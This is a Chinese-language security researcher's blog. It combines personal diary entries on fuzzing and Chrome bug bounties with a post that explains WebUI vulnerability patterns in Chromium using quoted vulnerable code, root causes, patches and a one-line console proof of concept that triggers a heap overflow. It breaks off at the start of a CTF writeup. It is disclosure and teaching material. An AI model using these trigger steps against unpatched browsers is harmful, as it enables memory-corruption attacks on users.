[$TBD][950328] Medium CVE-2019-5831: Incorrect map processing in V8. Reported by yngwei(JiaWei, Yin) of IIE Varas and sakura of Tecent Xuanwu Lab on 2019-04-07
https://support.apple.com/en-us/HT210123
CVE-2019-8583: sakura of Tencent Xuanwu Lab, and dwfault working at ADLab of Venustech
从开始搞浏览器到现在，差不多就是一年，去掉一些零零碎碎的做其他事情的时间，可能大概半年多一些，我也有自己的google和apple致谢了。
刚刚好在我毕业答辩期间收到编号，可能是我的毕业礼物了，thanks~哈哈
既然发了日记就说一下我的理解，在实习的这一年里认识了非常多的大佬，我在xuanwu lab的导师sky还有lw和明月师傅他们，r3kapig的Ne0和Atum他们，还有和我一起讨论学习的yngwei和dwfault,jessica他们，都给了我非常多的帮助和启发。
在推特上面也认识了不少的朋友，以及follow了很多大佬，尤其是project zero的saelo，跟进最新的漏洞并分析，研究漏洞挖掘的新技术新手法，不断提升自己。
所以学习这件事情，最重要的就是开阔视野，你以为的有用的东西并不真的有用，实际的漏洞挖掘考察的是对目标的理解和深度，并不是说和简单的CTF pwn一样，只是hack game，ctf非常有意义，但是也要认识到这一点，真正决定你能不能挖到漏洞的，永远是对目标软件的理解，并没有什么特别特别通用的知识。
Just spend a long time learning and doing it, you will get better.

2019-6-6

最近这几天一直在想漫长的一个月做点什么，嗯，没错，我毕业了，毕业答辩结束，应该没什么幺蛾子的话，会顺利的会玄武上班。
然后就有点迷茫，暂时，嗯，暂时不太想继续肝JS engine了，花了太久，产出有限，希望做些有趣的事情，嗯，当然fuzz还会继续跑。
想学的东西有点多，我是出于兴趣在搞技术的，有些复杂的东西其实不太想牵扯到其中，我喜欢挖到漏洞，喜欢和厉害的人交流技术弥补不足。
还想学更多有趣的东西。

2019-6-23

拿到了毕业证和学位证，准备入职了，列一下计划。
和@aSiagaming一起解决gctf chrome sandbox escape pwn.
https://capturetheflag.withgoogle.com/#challenges/sandbox-monochromatic
题目出处应该是这个issue。
https://bugs.chromium.org/p/project-zero/issues/detail?id=1755
现在需要补充大量的基础知识。
复习v8 JIT相关的知识和漏洞，准备一个share.
开始打hacker101的ctf，练习一些web的基础知识。
每天坚持锻炼和饮食。

2019-6-28

上班第一周，全在搬砖，一点漏洞研究的事情没做，粗略的翻了下ned的议题还有chrome mojo。
思想还需要转变，毕竟上班就是这样，leader让你干什么你就得干什么，哪怕你是造火箭的，也得来拧螺丝钉。
虽然很想挖洞，也觉得工作和自己想象中不一样，不够帅，但是，还是要积极调整啊。
我的第二个v8 cve可能要发下来了，开心。

2019-7-3

爬虫写的越来越快了。。我可以写篇博客讲爬虫了。。

学习natalie的挖洞思路，先把webrtc搭起来了。
https://github.com/googleprojectzero/Street-Party/blob/master/WebRTC/record.patch
natalie的编译脚本有点问题，改成下面这样就OK了,学习了一下谷歌的构建链。
https://blog.csdn.net/Vincent95/article/details/70849035

rtc_static_library("call") {
  sources = [
    "call.cc",
    "call_factory.cc",
    "call_factory.h",
    "degraded_call.cc",
    "degraded_call.h",
    "flexfec_receive_stream_impl.cc",
    "flexfec_receive_stream_impl.h",
    "receive_time_calculator.cc",
    "receive_time_calculator.h",
    "../test/rtp_file_writer.cc",
    "../test/rtp_file_writer.h",
  ]

  deps = [
    "../rtc_base:rtc_json",

调试分析漏洞。

2019-7-8

这周想给自己的漏洞写一下利用,CVE-2019-5831,issue-950328，这个洞是我回学校忙毕业的时候出的，一直没空仔细看，怎么说呢，从回学校毕业之后到现在，也有好几个月了，一直没有调试分析chrome漏洞了，其实对引擎的理解就还不够深刻，漏洞基本上是fuzz出的，这段时间也一直在考虑和去改fuzz，不过和大佬聊过之后觉得，挖漏洞这件事情，必须经常反思为什么别人能挖到，自己没挖到，是这个点没看到么，如果不是，那是什么原因。
嗯，是我看的还不够仔细，那就从自己的漏洞开始搞吧。

2019-7-28

这段时间基本上还是在改改FUZZ，然后挖到了我的第二个chrome v8 cve，其实是个很有趣的漏洞，等有空我会分享它，但总的来说，现在v8的JIT漏洞已经很难发现了，我现在主要发现的漏洞也不太和JIT有关，但是我很喜欢这类优化漏洞，所以我依然在梳理这方面的知识。
因为一些原因，重新看了看自己以前分析过的漏洞，在重新写文档，发现以前写的东西真的是和shi一样难看。在某个瞬间之后，我好像对这些漏洞的理解提升了，嗯，没有任何原因，就是单纯的随便翻了翻资料，重新看了看代码，看了看IR。
最近在腾讯的入职封闭培训，玩的还是很开心的，认识了更多有趣的人，嗯，都是大佬2333。其实最近是很迷茫的，对未来的迷茫，我好像走进了工作以后的第一个分叉点，但是开弓没有回头箭，我目前的目标就是认认真真的做安全研究，攻破每一个我没攻破过的目标。
说了这么多废话，其实这次的日记更新想写一些心得，这是我和某个大佬凌晨在湖边闲聊学到的。
在某个很长期的阶段，你会投身于某个领域，并对其进行深耕，但是如何保证你现在研究的，学到的知识，在五年后，甚至很短的一年后还有用，这其实是很难保证的，尤其是安全研究这个快速攻防迭代的领域，你积累下来的东西，很可能在下一年里就不再存在了，这当然有很多种不同的理解，其中之一是积累下来的东西还不够深，不够通用。
我认为逆向和开发的能力是十分重要的，比如当想到一个idea之后，能快速实现的coding能力，以及做任何非开源软件的攻防都必须具备的逆向能力。
嗯，说的比较笼统，但大家其实是可以思考一下，你学到的知识应该如何“保值”，如何提升自己的个人竞争力。

2019-8-8

最近还是挺烦的，各种烦心的事情，不过还是记录一下这段时间做了什么。
这段时间把loki挖的chakra的历史漏洞看了一下，主要理解一下chakracore的codebase，方便后面分析样本，然后准备写一个导入语料的功能，这样就可以通过根据筛选语料来导入更多的，嗯，基因突变，哈哈。
还是有很多事情想做，但是受限于能力没做成，不过，加油吧。test

2019-8-12

写了一下fuzzilli导入语料
todo list:
学习chrome sandbox escape
https://labs.bluefrostsecurity.de/blog/2019/08/08/escaping-the-chrome-sandbox-via-an-indexeddb-race-condition/

2019-9-12

最近我大概有新的chrome高危漏洞产出，期待下个月的致谢：），fuzz也有很多新思路在改了，target也不再局限在浏览器了
嘛，发生了好多事情…各方面都是，即将顺利的从玄武离职，其中个中曲折就不说了，社会人心险恶（茶
最近有挺多对安全研究和二进制漏洞挖掘怀有期望的年轻人问我问题，不过，我觉得他们需要好好审视几个问题。

第一，是否有足够扎实的开发或者逆向基础，包括但不限于以下。

1
2
3

1.C++ STL实现一套tiny STL且熟悉STL源码
2.Kernel自己实现一个，且熟悉Linux 2.6源码
3.使用LLVM backend pass实现过compiler，可参考UToronto Compiler Optimization且熟悉libfuzzer源码

第二，是否有追踪前沿的安全议题和漏洞，并有一些自己的思路和想法。
如果想清楚这些，并且能够做到上述的基础扎实，欢迎一起讨论问题呀2333

2019-10-24

现在在360 alpha team端茶倒水学审计。
彻底分成工作日记和生活日记了。。都快忘记更新了，good luck.

2020-1-11

新年快乐~民那桑

2020-12-31

新的一年发生了很多事，做个年末小总结。

去年到今天挖了三个chrome的高危漏洞，sqlite漏洞若干，从完全fuzzer转向部分代码审计，新的一年预计还会再深挖一些其他方向，捡一点软柿子捏捏。
做了一些内核方面的安全研究探索，不过有点失败，然后补了若干基础知识。
业余时间教了一些小朋友，不少都去大厂实习了。

2021-12-1

今年也快结束了，稍微做个小总结吧，我的日记也很久没更新过了。

今年的主要工作可能是在写js fuzz，网上开源的那些js fuzz没有一个用的顺手，索性码了几个月，写了2w+行cpp代码，完成了一个从读入js解析到ast变异的成品js fuzz，很有成就感，也帮助我挖了一批漏洞出来。
写了一个adobe reader pdfjs fuzz，也是出了一些漏洞，包括一个最新版可用的UAF，还需要继续调整，但确实算是初步入门了文件格式fuzz。
算上之前写的sqlite fuzz(需要重构)，我基本上也是覆盖了语义fuzz这块的完整技能栈了，比较有成就感，但是还不够。
codeql帮我找了不少沙箱洞，但是这个难以持续，我可能确实不太擅长做这种审计，但不妨碍codeql是一个极好的工具。
明年我想往逆向和fuzz这块继续做下去，尽量出一些好用的闭源fuzz出来。

2022-12-6

今年的年末总结趁着居家的最后一天写一下，又是一年过去了呢。

今年通过CodeQL+Fuzz大概挖了若干个Chrome漏洞，考虑到我因为一些原因是今年四月份开始挖的，姑且也算是勉强达到了一周一个洞的指标吧。
我今年到9月之前的主要工作是通过codeql审计漏洞模式，然后审了不少需要交互的UI或者边缘组件漏洞，后来chrome调整了奖励策略，鼓励远程无交互漏洞之后，我又回归了我的老本行搞Chrome Fuzz，通过基于变异和生成的浏览器Fuzz，我在WebGL和RenderFrame*上都出了几个高价值的漏洞，可以期待公开 :)
此外我今年第一次带实习生，我的实习生陈子灵和丁杰都很不错。
- 子灵同学在实习过程，基于我之前在SQLite的Fuzz工作进行继续的开发和审计，最终挖掘了多个高价值可利用的SQLite漏洞，SQLite是Chrome WebSQL的底层组件，所以可以用SQLite的漏洞来攻破Chrome，当然Chrome有它的白名单，所以并不是所有SQLite漏洞都能触发，我们目前提交了3个Chrome WebSQL的漏洞，分别可以造成任意地址读和越界写任意长度的效果，很接近RCE了，还有一些0day漏洞握在手上，具体的工作我们还在投稿blackhat，希望能中选。
- 丁杰同学在实习过程中，由于许多国产软件都有内置浏览器，所以和我一起为国产IM和国产办公软件编写了很多1day exp，并用于比赛，极大的改善了国产软件的安全性。他也基于我的js fuzzer工作为某pdf js引擎挖掘了0day RCE漏洞并编写了exp，虽然最终我们拿了一个多月之后被撞掉了，此外我们还有一些某国外大厂js引擎的类型混淆或者潜在UAF 0day漏洞，正在努力编写exp。
明年的愿景是继续深入探索浏览器的漏洞挖掘边界，挖掘更多个Chrome/Edge/Safari/Firefox的漏洞，当然愿景只是愿景，我还只是一个技术微末的水平，希望有机会能和大佬们多多交流，请联系我 :)

2024-05-19

迟来的年度总结，趁着搬家没有网，连着热点写一下 :）
过去的一年里我做了很多事情，包括多个Chrome和FireFox的RCE漏洞，以及Facebook的某些RCE漏洞，也第一次参加Meta和Google的BugBountyCon，和很多国际上的安全从业者交流，感觉很快乐，也了解到我Blog记录的学习经历鼓励了很多人，这也让我感觉很开心。

BlackHat Asia 2023: 《New Wine in an Old Bottle: Attacking Chrome WebSQL》
- https://www.blackhat.com/asia-23/briefings/schedule/#new-wine-in-an-old-bottle-attacking-chrome-websql-30653
BlackHat USA 2023 《The Hat Trick: Exploit Chrome Twice from Runtime to JIT》
- https://www.blackhat.com/us-23/briefings/schedule/#the-hat-trick-exploit-chrome-twice-from-runtime-to-jit-31557
ZeroCon 2024 《Attacking Chrome from Runtime to JIT Once Again》
- https://zer0con.org/
Chrome VRP Top20
- https://issues.chromium.org/issues/41482500
Meta WhiteHat top3
- https://bugbounty.meta.com/leaderboard/?league=&year=2023

不过整体来说，现在还是比较焦虑的，由于一些行业形势的变化，在国内安全研究不再是一个被鼓励的事情，我身边的人都逐渐不再做安全研究了，或者极少数转为了独立安全研究员。

厂商对于安全漏洞的缓解也越来越多，攻击面也越来越收窄，存量漏洞越来越少。事实上我相信系统层庞大的闭源代码里总归是还会有很多攻击面存在，但是我个人从业以来一直是在做开源软件的代码审计和Fuzz。

以及今年以来，Chrome在漏洞奖金上变的不那么慷慨，对我造成了很大影响，事实上作为一个多年的从业者，我感觉已经不是奖金腰斩那么简单的事情了，简直快砍到脚脖子了。

基于以上两个原因（漏洞越来越难挖，奖金越来越少），我最近半年做了大量的尝试，包括对Chrome的一些新攻击面的调查，以及国内国外其他厂商的漏洞挖掘，很遗憾都失败了，所以最近半年我基本上一直在吃老本，还是在原地打转，虽然我的老本还比较厚，让我没有摔的太快。

对于前者，探索Chrome新的攻击面方面：其实我觉得我已经摸到了百分之95，但是在最后一步遇到了极大的困难，我事实上挖掘了多个漏洞，但是在最后，我被很多缓解机制拦下来了。

对于后者，对国内国外其他厂商的漏洞挖掘方面：Apple不为浏览器漏洞付钱，不过他们在CVE编号这方面给的很慷慨，但这对我没什么用。微软我还在尝试，找了一些新的攻击面，提交了一些漏洞，但是在奖金方面，我觉得不太有希望。国内就不说了，只能说很失望。

不过说到底我还是在自己的舒适区里打转，我没有尝试去做一些逆向，挖掘一些苹果很看重的逻辑漏洞，也没有深入各种内核的研究，这对我来说跨度太大了。

此外，我试着跳出二进制安全做一些新的研究，但是很快我发现我在二进制安全上面的很多积累，在很多方面并没有办法迁移到新的领域上去，所以目前也没有成果，这让我同样焦虑。

基于此我暂时放弃了投递一些安全会议的原定计划，这会让我分散精力，我还在紧张的向前摸索着，如果我成功了，希望下一年的年终总结能够让你们知道，Legends Never Die。

WebUI:The easiest attack surface in Chromes

2022-12-03T05:09:52.847Z

“WebUI “是一个术语，用于宽泛地描述用网络技术（即HTML、CSS、JavaScript）实现的Chrome浏览器的部分UI。

Chromium中的WebUI的例子。

Settings (chrome://settings)
History (chrome://history)
Downloads (chrome://downloads)

关于webui具体怎么工作在这里将不展开，请参考官方文档详细阅读，本文将重点介绍webui中常见的几类漏洞模式。

https://chromium.googlesource.com/chromium/src/+/master/docs/webui_explainer.md

find but no check end

我们将以一个简单的漏洞模式来学习webui的数据流传递。

具体的说就是每个WebUI都会注册很多WebUIMessageHandler，而每个Handler上又会注册多个Message Callback，每个Message Callback都有一个对应的Message Name，可以通过这个Message Name来调用到对应的webui函数，并传入参数。

具体来说就是形如以下调用：

1	chrome.send("recordNavigation",[1337,0]);

case1: issue-1303614

由于该漏洞代码只存在于chromium dev，不存在发行版中，所以没有CVE，只有对应的issue编号。

Root Cause

https://bugs.chromium.org/p/chromium/issues/detail?id=1303614

让我们看一下代码，这里注册了一个名为recordNavigation的Message Callback，它将对应调用到HandleRecordNavigation函数，并处理传入的参数。

它将对传入的参数列表依次调用ConvertToNavigationView，将其强制转换为NavigationView类型的枚举值，分别得到from_view和to_view。

但由于这里并没有检查传入的参数是否小于NavigationView类型能处理的最大值，注意这里仅仅只有一个debug check，这个debug check在release发行版里是不存在的，所以可以试做没有检查。

这将导致在EmitScreenOpenDuration函数处理cast之后得到的from_view的时候，触发一个堆溢出。

这里它将对kOpenDurationMetrics列表进行find，但是由于没有检查传入的参数是否小于NavigationView类型能处理的最大值，所以它将find不到。

我们知道在c++里，find如果找不到，迭代器iter将指向end，这其实代表的是指向容器的最后一个元素的下一个。

而这里同样也没有检查find找不到的情况，也就是没有检查iter是否指向end，就直接解引用了。它同样也是使用了一个Debug Check，但这其实是无用的。

所以对iter解引用将直接越界，造成buffer overflow。

// content::WebUIMessageHandler:
void DiagnosticsMetricsMessageHandler::RegisterMessages() {
  DCHECK(web_ui());

  web_ui()->RegisterMessageCallback(
      kRecordNavigation, //----->"recordNavigation"
      base::BindRepeating(
          &DiagnosticsMetricsMessageHandler::HandleRecordNavigation,
          base::Unretained(this)));
}

enum class NavigationView {
  kSystem = 0,
  kConnectivity = 1,
  kInput = 2,
  kMaxValue = kInput,
};

// Converts base::Value to NavigationView based on enum values.
NavigationView ConvertToNavigationView(const base::Value& value) {
DCHECK(value.is_int());
  DCHECK_LE(value.GetInt(), static_cast<int>(NavigationView::kMaxValue));
  **return static_cast(value.GetInt());**
}

// Message Handlers:
void DiagnosticsMetricsMessageHandler::HandleRecordNavigation(
    const base::Value::List& args) {
  DCHECK_EQ(2u, args.size());
  DCHECK_NE(args[0], args[1]);

  **const NavigationView from_view = ConvertToNavigationView(args[0]);**
  const NavigationView to_view = ConvertToNavigationView(args[1]);
  const base::Time updated_start_time = base::Time::Now();

  // Recordable navigation event occurred.
  **EmitScreenOpenDuration(from_view, updated_start_time - navigation_started_);**

  // `current_view_` updated to recorded `to_view` and reset timer.
  current_view_ = to_view;
  navigation_started_ = updated_start_time;
}

void EmitScreenOpenDuration(const NavigationView screen,
                            const base::TimeDelta& time_elapsed) {
  // Map of screens within Diagnostics app to matching duration metric name.
  constexpr auto kOpenDurationMetrics =
      base::MakeFixedFlatMap({
          {NavigationView::kConnectivity,
           "ChromeOS.DiagnosticsUi.Connectivity.OpenDuration"},
          {NavigationView::kInput, "ChromeOS.DiagnosticsUi.Input.OpenDuration"},
          {NavigationView::kSystem,
           "ChromeOS.DiagnosticsUi.System.OpenDuration"},
      });

  **auto* iter = kOpenDurationMetrics.find(screen);**
  DCHECK(iter != kOpenDurationMetrics.end());

  base::UmaHistogramLongTimes100(std::string(iter->second), time_elapsed);
}

poc

browsing chrome://diagnostics and open devtools

execute chrome.send("recordNavigation",[1337,0]); in console.

patch

补丁就是加上了我刚刚提到的没有加的检查。

auto* iter = kOpenDurationMetrics.find(screen);
-  DCHECK(iter != kOpenDurationMetrics.end());
+  if (iter == kOpenDurationMetrics.end())
+    return;

other case

https://bugs.chromium.org/p/chromium/issues/detail?id=1303613

unique_ptr double init

case1: CVE-2022-2859

https://chromium.googlesource.com/chromium/src/+/08b5eaecf33165cda178517fa4ba070d1f598e16


void MultidevicePhoneHubHandler::RegisterMessages() {
  web_ui()->RegisterDeprecatedMessageCallback(
      "setFakePhoneHubManagerEnabled",
      base::BindRepeating(
          **&MultidevicePhoneHubHandler::HandleEnableFakePhoneHubManager**,
          base::Unretained(this)));
...
...
void MultidevicePhoneHubHandler::HandleEnableFakePhoneHubManager(
    const base::ListValue* args) {
  AllowJavascript();
  const auto& list = args->GetListDeprecated();
  CHECK(!list.empty());
  **const bool enabled = list[0].GetBool();**
  if (enabled) {
    **EnableFakePhoneHubManager();**
    return;
  }
  EnableRealPhoneHubManager();
}
...
...
void MultidevicePhoneHubHandler::EnableRealPhoneHubManager() {
  // If no FakePhoneHubManager is active, return early. This ensures that we
  // don't unnecessarily re-initialize the Phone Hub UI.
  if (!fake_phone_hub_manager_)
    return;

  PA_LOG(VERBOSE) << "Setting real Phone Hub Manager";
  Profile* profile = Profile::FromWebUI(web_ui());
  auto* phone_hub_manager =
      phonehub::PhoneHubManagerFactory::GetForProfile(profile);
  ash::SystemTray::Get()->SetPhoneHubManager(phone_hub_manager);

  RemoveObservers();
  fake_phone_hub_manager_.reset();
}
...
void MultidevicePhoneHubHandler::EnableFakePhoneHubManager() {
  DCHECK(!fake_phone_hub_manager_);
  PA_LOG(VERBOSE) << "Setting fake Phone Hub Manager";
  **fake_phone_hub_manager_ = std::make_unique();** //--->[0]
  ash::SystemTray::Get()->SetPhoneHubManager(**fake_phone_hub_manager_.get()**); // ---->[1]
  AddObservers();
}

void PhoneHubUiController::SetPhoneHubManager(
    phonehub::PhoneHubManager* phone_hub_manager) {
  if (phone_hub_manager == phone_hub_manager_)
    return;

  **CleanUpPhoneHubManager();**  //---->[2]

  **phone_hub_manager_ = phone_hub_manager;**  // ---->[1]
  if (phone_hub_manager_) {
    phone_hub_manager_->GetFeatureStatusProvider()->AddObserver(this);
    phone_hub_manager_->GetOnboardingUiTracker()->AddObserver(this);
    phone_hub_manager_->GetPhoneModel()->AddObserver(this);
  }

  UpdateUiState(GetUiStateFromPhoneHubManager());
}

void PhoneHubUiController::CleanUpPhoneHubManager() {
  if (!phone_hub_manager_)
    return;

  **phone_hub_manager_->GetFeatureStatusProvider**()->RemoveObserver(this); //---->[2]
  phone_hub_manager_->GetOnboardingUiTracker()->RemoveObserver(this);
  phone_hub_manager_->GetPhoneModel()->RemoveObserver(this);
}

[0] 当我们调用两次EnableFakePhoneHubManager, fake_phone_hub_manager_字段将会被初始化两次, 又由于fake_phone_hub_manager_是一个unique_ptr，所以前一次创建的FakePhoneHubManager将会被后一次创建释放掉。

[1] 但是第一次创建的fake_phone_hub_manager_的raw ptr还保存在PhoneHubUiController的phone_hub_manager_字段里

[2] 这将导致第二次调用EnableFakePhoneHubManager的时候，沿着EnableFakePhoneHubManager->SetPhoneHubManager->CleanUpPhoneHubManager 路径，再次使用到前一次被保存到phone_hub_manager_里的被释放的FakePhoneHubManager，造成UAF。

cross-thread calback race

case1: CVE-2022-1311

https://bugs.chromium.org/p/chromium/issues/detail?id=1310717

https://chromium.googlesource.com/chromium/src.git/+/HEAD/docs/threading_and_tasks.md

Chrome将运行UI并管理所有网页和插件进程的主进程称为“浏览器进程”或“浏览器”，而每个网页都运行在一个单独的进程里，这个进程称为渲染进程。

鉴于渲染进程在单独的进程中运行，所以Chrome有机会通过沙箱限制其对系统资源的访问，所有渲染器对网络和文件资源的访问都通过IPC来通知浏览器进程来完成。

在一个进程中，往往有如下几种线程：

一个 main thread
- 在 Browser 进程中 (BrowserThread::UI)：用于更新 UI
- 在 Render 进程中：运行Blink
一个 io thread
- 在 Browser 进程中(BrowserThread::IO): 用于处理 IPC 消息以及网络请求
- 在 Render 进程中：用于处理IPC消息
一些使用 base::Tread 创建的，有特殊用途的线程（可能存在）
一些在使用线程池时产生的线程（可能存在）

CVE-2022-1311

void CrostiniUpgrader::Backup(const ContainerId& container_id,
                              bool show_file_chooser,
                              content::WebContents* web_contents) {
  if (show_file_chooser) {
    CrostiniExportImport::GetForProfile(profile_)->ExportContainer(
        container_id, web_contents, MakeFactory());
    return;
  }
  base::FilePath default_path =
      CrostiniExportImport::GetForProfile(profile_)->GetDefaultBackupPath();
  **base::ThreadPool::PostTaskAndReplyWithResult**(
      FROM_HERE, {base::MayBlock()},
      base::BindOnce(&base::PathExists, default_path),
      base::BindOnce(&CrostiniUpgrader::OnBackupPathChecked,
                     weak_ptr_factory_.GetWeakPtr(), container_id, **web_contents**,
                     default_path));
}

我介绍一个我挖掘的漏洞，首先我们要知道Chrome线程内部是怎么实现任务的同步的，其实是通过派发一个回调给一个处理线程的MessageLoop，然后MessageLoop会调度该回调以执行其操作。

这个漏洞就是这么产生的，ThreadPool::PostTaskAndReplyWithResult是UI线程向线程池里的线程发送一个PathExists函数的回调，然后线程池会检查backup路径是否存在，然后当线程池执行完任务PathExists，它会向UI线程发送一个OnRestorePathChecked函数的回调，一个回调其实和一个闭包是相似的，它会包括一个函数指针和它使用的函数参数。

在这个过程中就可能产生条件竞争。因为OnRestorePathChecked的参数里包括了一个原始指针web_contents，这样的指针是没有被保护的，所以如果我们在线程池里正在执行PathExists的同时，我们在UI线程这边通过关闭网页把web_contents释放掉，从而当OnRestorePathChecked被发回到UI线程执行的时候，此时web_contents已经被释放掉了，解引用它的指针就会触发UAF。

other case

https://bugs.chromium.org/p/chromium/issues/detail?id=1320624

https://bugs.chromium.org/p/chromium/issues/detail?id=1322744

https://bugs.chromium.org/p/chromium/issues/detail?id=1311701

https://bugs.chromium.org/p/chromium/issues/detail?id=1304145

Listener no check destroyed

case1: issue-1315102

https://bugs.chromium.org/p/chromium/issues/detail?id=1315102

SupportToolMessageHandler::HandleStartDataExport 会创建一个 select_file_dialog_ [1] 并显示一个 SelectFileDialog对话框。

当 [1] 被调用时，this 原始指针被传递给ui::SelectFileDialog::Create ，并且传递的this 原始指针被保存在listener_ [2] 中。

当用户选择一个文件夹时，listener_->FileSelected(paths[0], index, params); [3]被调用来处理用户的文件夹选择。

但是，SupportToolMessageHandler::~SupportToolMessageHandler [4] 是默认析构函数，不会调
select_file_dialog_->ListenerDestroyed(); 将listener_ 置为nullptr。

如果用户在 SupportToolMessageHandler 被释放后选择了一个文件夹（即 listener_ 被释放），UAF 将在 [3] 中触发。

因此，我们可以构建以下 UAF 链：

通过chrome.send调用SupportToolMessageHandler::HandleStartDataExport
通过关闭webui网页来释放SupportToolMessageHandler
在SelectFileDialog里选择一个文件，在[3]中触发UAF。

scoped_refptr select_file_dialog_;
void SupportToolMessageHandler::HandleStartDataExport(
    const base::Value::List& args) {
  CHECK_EQ(1U, args.size());
  const base::Value::List* pii_items = args[0].GetIfList();
  DCHECK(pii_items);

  selected_pii_to_keep_ = GetSelectedPIIToKeep(pii_items);

  AllowJavascript();
  content::WebContents* web_contents = web_ui()->GetWebContents();
  gfx::NativeWindow owning_window =
      web_contents ? web_contents->GetTopLevelNativeWindow()
                   : gfx::kNullNativeWindow;
  select_file_dialog_ = ui::SelectFileDialog::Create(
      this,
      std::make_unique(web_ui()->GetWebContents()));

  select_file_dialog_->SelectFile(
      ui::SelectFileDialog::SELECT_SAVEAS_FILE,
      /*title=*/std::u16string(),
      /*default_path=*/
      GetDefaultFileToExport(handler_->GetCaseID(), data_collection_time_),
      /*file_types=*/nullptr,
      /*file_type_index=*/0,
      /*default_extension=*/base::FilePath::StringType(), owning_window,
      /*params=*/nullptr);
}

void SupportToolMessageHandler::FileSelected(const base::FilePath& path,
                                             int index,
                                             void* params) {
  FireWebUIListener("support-data-export-started");
  select_file_dialog_.reset();
  this->handler_->ExportCollectedData(
      std::move(selected_pii_to_keep_), path,
      base::BindOnce(&SupportToolMessageHandler::OnDataExportDone,
                     weak_ptr_factory_.GetWeakPtr()));
}

void SupportToolMessageHandler::FileSelectionCanceled(void* params) {
  selected_pii_to_keep_.clear();
  select_file_dialog_.reset();
}

// Checks `errors` and fires WebUIListener with the error message or the
// exported path according to the returned errors.
// type DataExportResult = {
//  success: boolean,
//  path: string,
//  error: string,
// }
void SupportToolMessageHandler::OnDataExportDone(
    base::FilePath path,
    std::set errors) {
  data_path_ = path;
  base::Value::Dict data_export_result;
  const auto& export_error = std::find_if(
      errors.begin(), errors.end(), [](const SupportToolError& error) {
        return (error.error_code == SupportToolErrorCode::kDataExportError);
      });
  if (export_error == errors.end()) {
    data_export_result.Set("success", true);
    std::string displayed_path = data_path_.AsUTF8Unsafe();
#if BUILDFLAG(IS_CHROMEOS_ASH)
    displayed_path = file_manager::util::GetPathDisplayTextForSettings(
        Profile::FromWebUI(web_ui()), displayed_path);
#endif  // BUILDFLAG(IS_CHROMEOS_ASH)
    data_export_result.Set("path", displayed_path);
    data_export_result.Set("error", std::string());
  } else {
    // If a data export error is found in the returned set of errors, send the
    // error message to UI with empty string as path since it means the export
    // operation has failed.
    data_export_result.Set("success", false);
    data_export_result.Set("path", std::string());
    data_export_result.Set("error", export_error->error_message);
  }
  FireWebUIListener("data-export-completed",
                    base::Value(std::move(data_export_result)));
}

void SupportToolMessageHandler::HandleShowExportedDataInFolder(
    const base::Value::List& args) {
  platform_util::ShowItemInFolder(Profile::FromWebUI(web_ui()), data_path_);
}

////////////////////////////////////////////////////////////////////////////////
//
// SupportToolUI
//
////////////////////////////////////////////////////////////////////////////////

SupportToolUI::SupportToolUI(content::WebUI* web_ui) : WebUIController(web_ui) {
  web_ui->AddMessageHandler(std::make_unique());

  // Set up the chrome://support-tool/ source.
  Profile* profile = Profile::FromWebUI(web_ui);
  content::WebUIDataSource::Add(
      profile, CreateSupportToolHTMLSource(web_ui->GetWebContents()->GetURL()));
}

SupportToolUI::~SupportToolUI() = default;
  **select_file_dialog_ = ui::SelectFileDialog::Create(
      this,** //----------> [1]
      **std::make_unique(web_ui()->GetWebContents()));**

  select_file_dialog_->SelectFile(
      ui::SelectFileDialog::SELECT_SAVEAS_FILE,
      /*title=*/std::u16string(),
      /*default_path=*/
      GetDefaultFileToExport(handler_->GetCaseID(), data_collection_time_),
      /*file_types=*/nullptr,
      /*file_type_index=*/0,
      /*default_extension=*/base::FilePath::StringType(), owning_window,
      /*params=*/nullptr);
}

// The listener to be notified of selection completion.
raw_ptr listener_;
SelectFileDialog::SelectFileDialog(Listener* listener,
                                   std::unique_ptr policy)
    : **listener_(listener)**, select_file_policy_(std::move(policy)) { // [2]
  DCHECK(listener_);
}

void SelectFileDialogImpl::OnSelectFileExecuted(
    Type type,
    std::unique_ptr run_state,
    void* params,
    const std::vector& paths,
    int index) {
  if (listener_) {
    // The paths vector is empty when the user cancels the dialog.
    if (paths.empty()) {
      listener_->FileSelectionCanceled(params);
    } else {
      switch (type) {
        case SELECT_FOLDER:
        case SELECT_UPLOAD_FOLDER:
        case SELECT_EXISTING_FOLDER:
        case SELECT_SAVEAS_FILE:
        case SELECT_OPEN_FILE:
          DCHECK_EQ(paths.size(), 1u);
          listener_->FileSelected(paths[0], index, params); // [3]
          break;
        case SELECT_OPEN_MULTI_FILE:
          listener_->MultiFilesSelected(paths, params);
          break;
        case SELECT_NONE:
          NOTREACHED();
      }
    }
  }

  EndRun(std::move(run_state));
}

~SupportToolMessageHandler() override = default; // [4]

patch

SupportToolMessageHandler::~SupportToolMessageHandler() {
  if (select_file_dialog_) {
    select_file_dialog_->ListenerDestroyed();
  }
}

...

void SupportToolMessageHandler::HandleStartDataExport(
    const base::Value::List& args) {
  CHECK_EQ(1U, args.size());
  const base::Value::List* pii_items = args[0].GetIfList();
  DCHECK(pii_items);
  // Early return if the select file dialog is already active.
  if (select_file_dialog_)
    return;

  selected_pii_to_keep_ = GetSelectedPIIToKeep(pii_items);

other case

https://bugs.chromium.org/p/chromium/issues/detail?id=1305068

https://bugs.chromium.org/p/chromium/issues/detail?id=1306391

https://bugs.chromium.org/p/chromium/issues/detail?id=1304884

realworldctf 2022 hso writeup与nso iMessage 0click漏洞分析

2022-02-10T09:48:08.111Z

realworldctf 2022 hso writeup与nso iMessage 0click漏洞分析

欢迎大家关注公众号”天问记事簿”，以及加入天问之路知识星球，一起做技术分享，一起学习，happy hack。

简介

本题的考点可能来源于Project Zero的A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution一文，这篇文章介绍了一个图片渲染库的整数溢出漏洞，以及如何通过这个漏洞来利用这个解析库原有的处理像素数据的与或非功能，构建了一个图灵完备的小型计算机，从而完成后续的漏洞利用。

但由于Linux平台相比，缓解机制并不完善，以及我们不需要对接一个sandbox escape漏洞来逃逸imessage沙箱，所以只需要简单的构建一个全加器就可以实现整个漏洞利用，体验到神奇的乐趣。

这里是复盘 RWCTF2022 中 hso groupie 题时所写下的一些笔记，在做题的过程中，我们大量阅读了fcd14492标准文档，如果你在做题或者阅读本文的过程中感觉难以理解，请参考文档的第0章/第7章和第6章等，想必会有所收获，感谢Riatre师傅提供的有趣题目。

整体的做题思路主要由作者 exploit 中所推导出，换句话说，这里的笔记主要是对作者 exploit 的解释说明。

由于这题同样也较为复杂，因此需要单独开一个博文来记录。

一、小叙

Help check how secure our latest PaaS (Pdftohtml-as-a-Service) is!
Pick your favorite bug from this bloody list, or really, just exploit that bug so your exploit would also work on latest Poppler [1] and maybe even KItinerary.
